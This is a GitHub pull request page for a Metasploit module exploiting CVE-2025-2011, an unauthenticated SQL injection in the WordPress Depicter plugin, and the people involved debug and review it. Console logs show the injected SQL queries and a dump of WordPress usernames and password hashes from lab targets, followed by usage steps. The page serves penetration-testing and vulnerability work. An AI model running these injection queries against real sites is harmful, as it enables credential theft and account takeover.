-
Notifications
You must be signed in to change notification settings - Fork 14.3k
Add WP Depicter Plugin Unauth SQL Injection (CVE-2025-2011) #20185
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add WP Depicter Plugin Unauth SQL Injection (CVE-2025-2011) #20185
Conversation
documentation/modules/auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011.md
Outdated
Show resolved
Hide resolved
modules/auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011.rb
Outdated
Show resolved
Hide resolved
modules/auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011.rb
Outdated
Show resolved
Hide resolved
Hello @dledda-r7 , I’m running into an odd issue with the auxiliary module: Working msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'cIJK')
[*] {SQLi} Encoded to (select 0x63494a4b)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 12 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 12 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(euCJqzGY) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) euCJqzGY from wp_users limit 1) zSl)
[*] {SQLi} Encoded to (select group_concat(euCJqzGY) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x7,0)),ifnull(user_pass,repeat(0x7b,0))) as binary) euCJqzGY from wp_users limit 1) zSl)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'chocapikk' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========
user_login user_pass
---------- ---------
chocapikk $wp$2y$10$rc5oXfNPG.bYSnbYvELKZeGgoQ9.QHcAXG8U/xunfXzsviMQkiPga
[+] Loot saved to: /home/chocapikk/.msf4/loot/20250521182831_default_127.0.0.1_wordpress.users_873419.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed Failing msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://lab:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'OEFldU')
[*] {SQLi} Encoded to (select 0x4f45466c6455)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in 'Rex::Socket.rex_resolve_hostname'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in 'Rex::Socket.rex_getaddrinfo'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in 'Rex::Socket.getaddresses'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in 'Rex::Socket.getaddress'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in 'Rex::Socket.resolv_nbo'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in 'Rex::Socket.resolv_nbo_i'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in 'Rex::Socket::SwitchBoard#best_comm'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in 'Rex::Socket::SwitchBoard.best_comm'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in 'Rex::Socket::Parameters#comm'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in 'Rex::Socket.create_param'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in 'Rex::Socket::Tcp.create_param'
[-] /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in 'Rex::Socket::Tcp.create'
[-] /opt/metasploit/lib/rex/proto/http/client.rb:177:in 'Rex::Proto::Http::Client#connect'
[-] /opt/metasploit/lib/rex/proto/http/client.rb:262:in 'Rex::Proto::Http::Client#send_request'
[-] /opt/metasploit/lib/rex/proto/http/client.rb:240:in 'Rex::Proto::Http::Client#_send_recv'
[-] /opt/metasploit/lib/rex/proto/http/client.rb:214:in 'Rex::Proto::Http::Client#send_recv'
[-] /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:381:in 'Msf::Exploit::Remote::HttpClient#send_request_raw'
[-] /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:423:in 'Msf::Exploit::Remote::HttpClient#send_request_cgi'
[-] /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in 'block in Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#get_sqli_object'
[-] /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:58:in 'Msf::Exploit::SQLi::Common#raw_run_sql'
[-] /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:69:in 'Msf::Exploit::SQLi::Common#run_sql'
[-] /opt/metasploit/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in 'Msf::Exploit::SQLi::MySQLi::Common#test_vulnerable'
[-] /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in 'Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#check'
[-] /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:44:in 'Msf::Exploit::Remote::AutoCheck#with_prepended_auto_check'
[-] /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:20:in 'Msf::Exploit::Remote::AutoCheck#run'
[*] Auxiliary module execution completed Do you have any insight into why this is happening? Thanks! |
Looks like an unrelated issue. I have digged a bit and i think we are passing the whole RHOSTS to the name resolver which doesn't look correct. adding @zeroSteiner for visibility as he was working on rex-socket currently.
additional context. seems a problem related to this module but not to all auxiliary modules.
|
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Looks good
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://127.0.0.1:5555
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'I3pDUa69ad')
[*] {SQLi} Encoded to (select 0x49337044556136396164)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 6 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 6 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(KbVRV) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) KbVRV from wp_users limit 1) jgpkCCkA)
[*] {SQLi} Encoded to (select group_concat(KbVRV) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xc3,0)),ifnull(user_pass,repeat(0x80,0))) as binary) KbVRV from wp_users limit 1) jgpkCCkA)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'admin' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========
user_login user_pass
---------- ---------
admin $wp$2y$10$M8h2oj7BOKVXdKQMqYADbO8p3amrEj2iwVk0oGXYaGOpx948QVls2
[+] Loot saved to: /home/kali/.msf4/loot/20250528120414_default_127.0.0.1_wordpress.users_787790.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) >
Hello Metasploit Team,
This PR implements a new auxiliary scanner module
scanner/http/wp_depicter_sqli_cve_2025_2011
for CVE-2025-2011, an UNAUTHENTICATED SQL injection in the Slider & Popup Builder by Depicter plugin (≤ 3.6.1).The module automates:
admin-ajax.php?s=
user_login:user_pass
) from the inferred*_users
tablewordpress.users
), and reportingVerification
msfconsole
use auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011
set RHOSTS <target_ip>
set RPORT <http_port>
set TARGETURI /
set COUNT 1
exploit_market
)wp_users
)wordpress.users